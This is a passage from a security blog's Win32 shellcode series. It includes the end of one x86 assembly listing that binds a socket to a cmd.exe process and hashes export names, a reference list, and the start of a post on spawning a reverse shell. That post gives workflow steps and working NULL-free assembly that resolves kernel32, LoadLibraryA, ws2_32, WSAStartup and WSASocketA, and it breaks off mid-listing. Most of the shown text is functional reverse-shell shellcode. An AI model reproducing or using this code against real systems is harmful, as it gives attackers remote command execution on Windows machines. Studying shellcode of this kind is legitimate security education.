<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; our socket becomes the shells hStdOutput</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; our socket becomes the shells hStdInput</span>
<span class="nf">xor</span> <span class="nb">edi</span><span class="p">,</span> <span class="nb">edi</span> <span class="c1">; Clear edi for all the NULL's we need to push</span>
<span class="nf">push</span> <span class="kt">byte</span> <span class="mh">0x12</span> <span class="c1">; We want to place (18 * 4) = 72 null bytes onto the stack</span>
<span class="nf">pop</span> <span class="nb">ecx</span> <span class="c1">; Set ECX for the loop</span>
<span class="nl">push_loop:</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; push a null dword</span>
<span class="nf">loop</span> <span class="nv">push_loop</span> <span class="c1">; keep looping untill we have pushed enough nulls</span>
<span class="nf">mov</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x3C</span><span class="p">],</span> <span class="mh">0x0101</span> <span class="c1">; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW</span>
<span class="nf">mov</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">],</span> <span class="mh">0x44</span>
<span class="nf">lea</span> <span class="nb">ecx</span><span class="p">,</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">]</span> <span class="c1">; Set EAX as a pointer to our STARTUPINFO Structure</span>
<span class="c1">;perform the call to CreateProcessA</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; Push the pointer to the PROCESS_INFORMATION Structure </span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; Push the pointer to the STARTUPINFO Structure</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; The lpEnvironment is NULL so the new process will have the same enviroment as its parent</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; We dont specify any dwCreationFlags </span>
<span class="nf">inc</span> <span class="nb">edi</span> <span class="c1">; Increment edi to be one</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent</span>
<span class="nf">dec</span> <span class="nb">edi</span> <span class="c1">; Decrement edi back down to zero</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; Set lpThreadAttributes to NULL</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; Set lpProcessAttributes to NULL</span>
<span class="nf">push</span> <span class="nb">ebp</span> <span class="c1">; Set the lpCommandLine to point to "cmd",0</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; Set lpApplicationName to NULL as we are using the command line param instead</span>
<span class="nf">call</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0x10</span><span class="p">]</span>
<span class="nl">callExitProcess:</span>
<span class="nf">xor</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; uExitCode</span>
<span class="nf">call</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0x14</span><span class="p">]</span> <span class="c1">; call ExitProcess(0)</span>
<span class="c1">;----------------------------------------------------------;</span>
<span class="c1">; Functions called ;</span>
<span class="c1">;----------------------------------------------------------;</span>
<span class="nl">findSymbolByHash:</span>
<span class="nf">pushad</span>
<span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x24</span><span class="p">]</span> <span class="c1">; load 1st arg: dllBase</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebp</span> <span class="o">+</span> <span class="mh">0x3c</span><span class="p">]</span> <span class="c1">; get offset to PE signature</span>
<span class="c1">; load edx w/ DataDirectories array: assumes PE32</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebp</span> <span class="o">+</span> <span class="nb">eax</span> <span class="o">+</span> <span class="mi">4</span><span class="o">+</span><span class="mi">20</span><span class="o">+</span><span class="mi">96</span><span class="p">]</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; edx:= addr IMAGE_EXPORT_DIRECTORY</span>
<span class="nf">mov</span> <span class="nb">ecx</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x18</span><span class="p">]</span> <span class="c1">; ecx:= NumberOfNames</span>
<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">]</span> <span class="c1">; ebx:= RVA of AddressOfNames</span>
<span class="nf">add</span> <span class="nb">ebx</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; rva->va</span>
<span class="nl">search_loop:</span>
<span class="nf">dec</span> <span class="nb">ecx</span> <span class="c1">; dec loop counter</span>
<span class="c1">; esi:= next name, uses ecx*4 because each pointer is 4 bytes</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span><span class="o">+</span><span class="nb">ecx</span><span class="o">*</span><span class="mi">4</span><span class="p">]</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; rva->va</span>
<span class="nf">push</span> <span class="nb">esi</span>
<span class="nf">call</span> <span class="nb">edi</span> <span class="c1">; hash the current string</span>
<span class="nf">add</span> <span class="nb">sp</span><span class="p">,</span> <span class="mi">4</span>
<span class="c1">; check hash result against arg #2 on stack: symHash</span>
<span class="nf">cmp</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x28</span><span class="p">]</span>
<span class="nf">jnz</span> <span class="nv">search_loop</span>
<span class="c1">; at this point we found the string in AddressOfNames</span>
<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span><span class="o">+</span><span class="mh">0x24</span><span class="p">]</span> <span class="c1">; ebx:= ordinal table rva</span>
<span class="nf">add</span> <span class="nb">ebx</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; rva->va</span>
<span class="c1">; turn cx into ordinal from name index.</span>
<span class="c1">; use ecx*2: each value is 2 bytes</span>
<span class="nf">mov</span> <span class="nb">cx</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span><span class="o">+</span><span class="nb">ecx</span><span class="o">*</span><span class="mi">2</span><span class="p">]</span>
<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span><span class="o">+</span><span class="mh">0x1c</span><span class="p">]</span> <span class="c1">; ebx:= RVA of AddressOfFunctions</span>
<span class="nf">add</span> <span class="nb">ebx</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; rva->va</span>
<span class="c1">; eax:= Export function rva. Use ecx*4: each value is 4 bytes</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span><span class="o">+</span><span class="nb">ecx</span><span class="o">*</span><span class="mi">4</span><span class="p">]</span>
<span class="nf">add</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; rva->va</span>
<span class="nl">done:</span>
<span class="nf">mov</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x1c</span><span class="p">],</span> <span class="nb">eax</span> <span class="c1">; overwrite eax saved on stack</span>
<span class="nf">popad</span>
<span class="nf">ret</span>
<span class="nl">hashString:</span>
<span class="nf">push</span> <span class="nb">esi</span>
<span class="nf">push</span> <span class="nb">edi</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">esp</span><span class="o">+</span><span class="mh">0x0c</span><span class="p">]</span> <span class="c1">; load function argument in esi</span>
<span class="nl">calc_hash:</span>
<span class="nf">xor</span> <span class="nb">edi</span><span class="p">,</span> <span class="nb">edi</span>
<span class="nf">cld</span>
<span class="nl">hash_iter:</span>
<span class="nf">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">eax</span>
<span class="nf">lodsb</span> <span class="c1">; load next byte of input string</span>
<span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">ah</span>
<span class="nf">je</span> <span class="nv">hash_done</span> <span class="c1">; check if at end of symbol</span>
<span class="nf">ror</span> <span class="nb">edi</span><span class="p">,</span> <span class="mh">0x0d</span> <span class="c1">; rotate right 13 (0x0d)</span>
<span class="nf">add</span> <span class="nb">edi</span><span class="p">,</span> <span class="nb">eax</span>
<span class="nf">jmp</span> <span class="nv">hash_iter</span>
<span class="nl">hash_done:</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">edi</span>
<span class="nf">pop</span> <span class="nb">edi</span>
<span class="nf">pop</span> <span class="nb">esi</span>
<span class="nf">ret</span>
</code></pre></div></div>
<p><img src="/assets/images/windows/x86/reverse_shell_hash_0.gif" alt="" /><br /></p>
<p>The shellcode is NULL free.<br /></p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://nostarch.com/malware">This amazing book</a> help me a lot understand how Win32 kernel API works</li>
<li><a href="https://h0mbre.github.io/Babys-First-Shellcode/">The amazing h0mbre blog</a></li>
<li><a href="https://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/">Introduction to Windows Shellcode Development – Part 3</a> by <a href="https://twitter.com/NytroRST/">@NytroRST</a></li>
<li><a href="https://0xdarkvortex.dev/index.php/2019/03/18/windows-shellcoding-x86-hunting-kernel32-dll-part-1/">Windows Shellcoding x86 – Hunting Kernel32.dll – Part 1</a> by <a href="https://twitter.com/NinjaParanoid">@NinjaParanoid</a></li>
<li><a href="http://www.vividmachines.com/shellcode/shellcode.html#ws">Shellcoding for Linux and Windows Tutorial</a> by <a href="https://twitter.com/lestevehanna">Steve Hanna</a></li>
<li><a href="http://hick.org/code/skape/papers/win32-shellcode.pdf">A good paper book</a></li>
<li><a href="https://marcosvalle.github.io/re/exploit/2019/01/19/messagebox-shellcode.html">Windows x86 MessageBox shellcode</a> by <a href="https://twitter.com/_mvalle_">@MValle</a></li>
<li><a href="https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html">The PacketStorm Calc Shellcode</a></li>
<li><a href="https://github.com/bolonobolo/shellcode">My Github Win x86 shellcode repo</a></li>
</ul>{"name"=>nil, "avatar"=>"/assets/images/blackcloud3.png", "bio"=>"Made to broke things", "location"=>"noplace", "email"=>nil, "links"=>[{"label"=>"Email", "icon"=>"fas fa-fw fa-envelope-square", "url"=>"mailto:bolo@autistici.org"}, {"label"=>"Website", "icon"=>"fas fa-fw fa-link"}, {"label"=>"Twitter", "icon"=>"fab fa-fw fa-twitter-square", "url"=>"https://twitter.com/bolonobolo"}, {"label"=>"Facebook", "icon"=>"fab fa-fw fa-facebook-square"}, {"label"=>"GitHub", "icon"=>"fab fa-fw fa-github", "url"=>"https://github.com/bolonobolo"}, {"label"=>"Instagram", "icon"=>"fab fa-fw fa-instagram"}, {"label"=>"Hackthebox", "url"=>"https://www.hackthebox.eu/profile/8822", "icon"=>"fas fa-fw fa-link"}]}Win32 Shellcode - Spawn Reverse Shell2019-11-16T00:00:00+00:002019-11-16T00:00:00+00:00https://blackcloud.me/Win32-shellcode-4<p><img src="/assets/images/shell.png" alt="" /><br /></p>
<h2 id="introduction">Introduction</h2>
<p><a href="https://blackcloud.me/Win32-shellcode-3/">In the last post</a> we spawned a custom MessagBox on Windows x86. Now we’ll move on to all of us want to do, a reverse shell. This type of command need a process like MessageBox but we need to load a different dll, the <code class="language-plaintext highlighter-rouge">ws2_32.dll</code> library so we need to reuse the <code class="language-plaintext highlighter-rouge">LoadLibraryA</code> for search the functions needed, with the right data structures as parameters.<br />
As sais the concepts are more or less the same of the past shellcode.<br /></p>
<h2 id="the-workflow">The Workflow</h2>
<p>As you can see in the code above the first part is the same of the MessageBox shellcode, but instead of <code class="language-plaintext highlighter-rouge">User32.dll</code>, we need the <code class="language-plaintext highlighter-rouge">ws2_32.dll</code> handler.
The process can be resumed in this steps:</p>
<ol>
<li>Get <code class="language-plaintext highlighter-rouge">kernel32.dll</code> and store its address somewhere for future purposes</li>
<li>Find the <code class="language-plaintext highlighter-rouge">GetProcAddress</code> function address and store it somewhere for future purposes</li>
<li>Find the <code class="language-plaintext highlighter-rouge">LoadLibraryA</code> address</li>
<li>Use <code class="language-plaintext highlighter-rouge">LoadLibraryA</code> to find <code class="language-plaintext highlighter-rouge">ws2_32.dll</code> address and store it somewhere for future purposes</li>
<li>Use <code class="language-plaintext highlighter-rouge">GetProcAddress</code> and <code class="language-plaintext highlighter-rouge">ws2_32.dll</code> to find and call the <code class="language-plaintext highlighter-rouge">WSAStartup</code> function, <a href="https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsastartup">MSDN documentation here</a></li>
<li>Use <code class="language-plaintext highlighter-rouge">GetProcAddress</code> and <code class="language-plaintext highlighter-rouge">ws2_32.dll</code> to find and call the <code class="language-plaintext highlighter-rouge">WSASocketA</code> function, <a href="https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasocketa">MSDN documentation here</a></li>
<li>Use <code class="language-plaintext highlighter-rouge">GetProcAddress</code> and <code class="language-plaintext highlighter-rouge">ws2_32.dll</code> to find and call the <code class="language-plaintext highlighter-rouge">Connect</code> function, <a href="https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-connect">MSDN documentation here</a></li>
<li>Find the <code class="language-plaintext highlighter-rouge">CreateProcessA</code> function using the <code class="language-plaintext highlighter-rouge">GetProcAddress</code> and the <code class="language-plaintext highlighter-rouge">kerne32.dll</code> handler previously stored</li>
<li>Call a <code class="language-plaintext highlighter-rouge">cmd.exe</code> Process on the socket opened with <code class="language-plaintext highlighter-rouge">Connect</code> using the <code class="language-plaintext highlighter-rouge">CreateProcessA</code> address</li>
<li>Call the <code class="language-plaintext highlighter-rouge">ExitProcess</code> function using the <code class="language-plaintext highlighter-rouge">GetProcAddress</code> and the <code class="language-plaintext highlighter-rouge">kerne32.dll</code> handler previously stored</li>
</ol>
<p>As you can see there a lot of stuffs to do, and there are also some considerations to do about data structures needed</p>
<h3 id="wsastartup">WSAStartup</h3>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">WSAStartup</span><span class="p">(</span><span class="n">MAKEWORD</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">),</span> <span class="n">wsadata_pointer</span><span class="p">)</span>
<span class="kt">int</span> <span class="nf">WSAStartup</span><span class="p">(</span>
<span class="n">WORD</span> <span class="n">wVersionRequired</span><span class="p">,</span>
<span class="n">LPWSADATA</span> <span class="n">lpWSAData</span>
<span class="p">);</span>
</code></pre></div></div>
<blockquote>
<p>The current version of the Windows Sockets specification is version 2.2. […]
To get full access to the new syntax of a higher version of the Windows Sockets specification, the application must negotiate for this higher version. In this case, the wVersionRequested parameter should be set to request version 2.2. […]
Windows Sockets version 2.2 is supported on Windows Server 2008, Windows Vista, Windows Server 2003, Windows XP, Windows 2000, Windows NT 4.0 with Service Pack 4 (SP4) and later, Windows Me, Windows 98, and Windows 95 OSR2. Windows Sockets version 2.2 is also supported on
Windows 95 with the Windows Socket 2 Update. Applications on these platforms should normally request Winsock 2.2 by setting the wVersionRequested parameter accordingly.
On Windows 95 and versions of Windows NT 3.51 and earlier, Windows Sockets version 1.1 is the highest version of the Windows Sockets specification supported.<br /></p>
</blockquote>
<p>You can read Marco’s blogpost for a deep explanation.<br />
The <a href="https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-wsadata">WSAData</a> structure is well defined in manual.<br />
If successful, the WSAStartup function returns zero in EAX. Otherwise, it returns error codes.</p>
<h3 id="wsasocketa">WSASocketA</h3>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SOCKET</span> <span class="n">WSAAPI</span> <span class="nf">WSASocketA</span><span class="p">(</span>
<span class="kt">int</span> <span class="n">af</span><span class="p">,</span>
<span class="kt">int</span> <span class="n">type</span><span class="p">,</span>
<span class="kt">int</span> <span class="n">protocol</span><span class="p">,</span>
<span class="n">LPWSAPROTOCOL_INFOA</span> <span class="n">lpProtocolInfo</span><span class="p">,</span>
<span class="n">GROUP</span> <span class="n">g</span><span class="p">,</span>
<span class="n">DWORD</span> <span class="n">dwFlags</span>
<span class="p">);</span>
</code></pre></div></div>
<p>RTFM because it is very simple here, similar to the socket syscall in Linux. We are in Little Endian so reverse the order of parameters pushed on stack and analyze it:</p>
<ul>
<li>dwFlags=NULL</li>
<li>g=NULL</li>
<li>lpProtocolInfo=NULL</li>
<li>protocol must be IPPROTO_TCP so protocol=6</li>
<li>Type must be SOCK_STREAM so type=1</li>
<li>Address Family must be AF_INET so af=2</li>
</ul>
<h3 id="connect">Connect</h3>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="n">WSAAPI</span> <span class="nf">connect</span><span class="p">(</span>
<span class="n">SOCKET</span> <span class="n">s</span><span class="p">,</span>
<span class="k">const</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="n">name</span><span class="p">,</span>
<span class="kt">int</span> <span class="n">namelen</span>
<span class="p">);</span>
</code></pre></div></div>
<p>Parameters:<br />
<code class="language-plaintext highlighter-rouge">s</code> is a descriptor identifying an unconnected socket.<br />
<code class="language-plaintext highlighter-rouge">name</code> is a pointer to the sockaddr structure to which the connection should be established.<br />
<code class="language-plaintext highlighter-rouge">namelen</code> is the length, in bytes, of the sockaddr structure pointed to by the name parameter.<br />
If no error occurs, connect returns zero. Otherwise, it returns SOCKET_ERROR, and a specific error code can be retrieved by calling.<br /></p>
<h2 id="the-shellcode">The Shellcode</h2>
<p>The comments in the code help understand how it works:<br /></p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">global</span> <span class="nv">_start</span>
<span class="nf">section</span> <span class="nv">.text</span>
<span class="nl">_start:</span>
<span class="nl">getkernel32:</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span> <span class="c1">; zeroing register ECX</span>
<span class="nf">mul</span> <span class="nb">ecx</span> <span class="c1">; zeroing register EAX EDX</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">fs</span><span class="p">:</span><span class="nb">ecx</span> <span class="o">+</span> <span class="mh">0x030</span><span class="p">]</span> <span class="c1">; PEB loaded in eax</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x00c</span><span class="p">]</span> <span class="c1">; LDR loaded in eax</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x014</span><span class="p">]</span> <span class="c1">; InMemoryOrderModuleList loaded in esi</span>
<span class="nf">lodsd</span> <span class="c1">; program.exe address loaded in eax (1st module)</span>
<span class="nf">xchg</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">eax</span>
<span class="nf">lodsd</span> <span class="c1">; ntdll.dll address loaded (2nd module)</span>
<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">]</span> <span class="c1">; kernel32.dll address loaded in ebx (3rd module)</span>
<span class="c1">; EBX = base of kernel32.dll address</span>
<span class="nl">getAddressofName:</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span> <span class="o">+</span> <span class="mh">0x3c</span><span class="p">]</span> <span class="c1">; load e_lfanew address in ebx</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x78</span><span class="p">]</span> <span class="c1">; load data directory</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">]</span> <span class="c1">; load "address of name"</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span>
<span class="c1">; ESI = RVAs</span>
<span class="nl">getProcAddress:</span>
<span class="nf">inc</span> <span class="nb">ecx</span> <span class="c1">; ordinals increment</span>
<span class="nf">lodsd</span> <span class="c1">; get "address of name" in eax</span>
<span class="nf">add</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span><span class="p">],</span> <span class="mh">0x50746547</span> <span class="c1">; GetP</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x4</span><span class="p">],</span> <span class="mh">0x41636F72</span> <span class="c1">; rocA</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nf">cmp</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x8</span><span class="p">],</span> <span class="mh">0x65726464</span> <span class="c1">; ddre</span>
<span class="nf">jnz</span> <span class="nv">getProcAddress</span>
<span class="nl">getProcAddressFunc:</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x24</span><span class="p">]</span> <span class="c1">; offset ordinals</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; pointer to the name ordinals table</span>
<span class="nf">mov</span> <span class="nb">cx</span><span class="p">,</span> <span class="p">[</span><span class="nb">esi</span> <span class="o">+</span> <span class="nb">ecx</span> <span class="o">*</span> <span class="mi">2</span><span class="p">]</span> <span class="c1">; CX = Number of function</span>
<span class="nf">dec</span> <span class="nb">ecx</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x1c</span><span class="p">]</span> <span class="c1">; ESI = Offset address table</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; we placed at the begin of AddressOfFunctions array</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">esi</span> <span class="o">+</span> <span class="nb">ecx</span> <span class="o">*</span> <span class="mi">4</span><span class="p">]</span> <span class="c1">; EDX = Pointer(offset)</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebx</span> <span class="c1">; EDX = getProcAddress</span>
<span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="nb">edx</span> <span class="c1">; save getProcAddress in EBP for future purpose</span>
<span class="nl">getLoadLibraryA:</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span> <span class="c1">; zeroing ecx</span>
<span class="nf">push</span> <span class="nb">ecx</span> <span class="c1">; push 0 on stack</span>
<span class="nf">push</span> <span class="mh">0x41797261</span> <span class="c1">; </span>
<span class="nf">push</span> <span class="mh">0x7262694c</span> <span class="c1">; AyrarbiLdaoL</span>
<span class="nf">push</span> <span class="mh">0x64616f4c</span> <span class="c1">;</span>
<span class="nf">push</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="nb">ebx</span> <span class="c1">; kernel32.dll</span>
<span class="nf">call</span> <span class="nb">edx</span> <span class="c1">; call GetProcAddress and find LoadLibraryA address</span>
<span class="c1">; EAX 76392864 kernel32.LoadLibraryA</span>
<span class="c1">; ECX 76340000 kernel32.76340000</span>
<span class="c1">; EDX 76340000 kernel32.76340000</span>
<span class="c1">; EBX 76340000 kernel32.76340000</span>
<span class="c1">; ESP 0022FF7C ASCII "LoadLibraryA"</span>
<span class="c1">; EBP 76391837 kernel32.GetProcAddress</span>
<span class="c1">; ESI 763F4DD0 kernel32.763F4DD0</span>
<span class="c1">; EDI 00000000</span>
<span class="c1">; EIP 0040106F reverse_.0040106F</span>
<span class="nl">getws2_32:</span>
<span class="nf">push</span> <span class="mh">0x61613233</span> <span class="c1">; 23</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x2</span><span class="p">],</span> <span class="mh">0x6161</span> <span class="c1">; sub aa from aa23_2sw</span>
<span class="nf">push</span> <span class="mh">0x5f327377</span> <span class="c1">; _2sw</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; pointer to the string</span>
<span class="nf">call</span> <span class="nb">eax</span> <span class="c1">; call Loadlibrary and find ws2_32.dll</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">eax</span> <span class="c1">; save winsock handle for future puproses</span>
<span class="c1">; EAX 76740000 OFFSET ws2_32.#332</span>
<span class="c1">; ECX 77DC316F ntdll.77DC316F</span>
<span class="c1">; EDX 005E0174</span>
<span class="c1">; EBX 76660000 kernel32.76660000</span>
<span class="c1">; ESP 0022FF74 ASCII "ws2_32"</span>
<span class="c1">; EBP 766B1837 kernel32.GetProcAddress</span>
<span class="c1">; ESI 76740000 OFFSET ws2_32.#332</span>
<span class="c1">; EDI 00000000</span>
<span class="c1">; EIP 00401085 reverse_.00401085</span>
<span class="nl">getWSAStartup:</span>
<span class="nf">push</span> <span class="mh">0x61617075</span> <span class="c1">; aapu</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x2</span><span class="p">],</span> <span class="mh">0x6161</span> <span class="c1">; sub aa from aapu</span>
<span class="nf">push</span> <span class="mh">0x74726174</span> <span class="c1">; trat</span>
<span class="nf">push</span> <span class="mh">0x53415357</span> <span class="c1">; SASW</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; pointer to the string</span>
<span class="nf">push</span> <span class="nb">esi</span> <span class="c1">; winsock handler</span>
<span class="nf">call</span> <span class="nb">ebp</span> <span class="c1">; GetProcAddress(ws2_32.dll, WSAStartup)</span>
<span class="c1">; EAX 7674C0FB ws2_32.WSAStartup</span>
<span class="c1">; ECX 76740000 OFFSET ws2_32.#332</span>
<span class="c1">; EDX 00001725</span>
<span class="c1">; EBX 76660000 kernel32.76660000</span>
<span class="c1">; ESP 0022FF68 ASCII "WSAStartup"</span>
<span class="c1">; EBP 766B1837 kernel32.GetProcAddress</span>
<span class="c1">; ESI 76740000 OFFSET ws2_32.#332</span>
<span class="c1">; EDI 00000000</span>
<span class="c1">; EIP 0040109F reverse_.0040109F</span>
<span class="nl">callWSAStartUp:</span>
<span class="nf">xor</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">edx</span>
<span class="nf">mov</span> <span class="nb">dx</span><span class="p">,</span> <span class="mh">0x190</span> <span class="c1">; EAX = sizeof( struct WSAData )</span>
<span class="nf">sub</span> <span class="nb">esp</span><span class="p">,</span> <span class="nb">edx</span> <span class="c1">; alloc some space for the WSAData structure</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; push a pointer to this stuct</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; push the wVersionRequested parameter</span>
<span class="nf">call</span> <span class="nb">eax</span> <span class="c1">; call WSAStartup(MAKEWORD(2, 2), wsadata_pointer)</span>
<span class="c1">; EAX 00000000</span>
<span class="c1">; ECX 7674C230 ws2_32.7674C230</span>
<span class="c1">; EDX 77DB0002 ASCII "ingToUnicodeString"</span>
<span class="c1">; EBX 76660000 kernel32.76660000</span>
<span class="c1">; ESP 0022FDD8</span>
<span class="c1">; EBP 766B1837 kernel32.GetProcAddress</span>
<span class="c1">; ESI 76740000 OFFSET ws2_32.#332</span>
<span class="c1">; EDI 00000000</span>
<span class="c1">; EIP 004010AA reverse_.004010AA</span>
<span class="nl">getWSASocketA:</span>
<span class="nf">push</span> <span class="mh">0x61614174</span> <span class="c1">; 'aaAt'</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x2</span><span class="p">],</span> <span class="mh">0x6161</span> <span class="c1">; sub aa from aaAt</span>
<span class="nf">push</span> <span class="mh">0x656b636f</span> <span class="c1">; 'ekco'</span>
<span class="nf">push</span> <span class="mh">0x53415357</span> <span class="c1">; 'SASW'</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; pointer to the string</span>
<span class="nf">push</span> <span class="nb">esi</span> <span class="c1">; socket handler</span>
<span class="nf">call</span> <span class="nb">ebp</span> <span class="c1">; GetProcAddress(ws2_32.dll, WSASocketA)</span>
<span class="c1">; EAX 7674B7FC ws2_32.WSASocketA</span>
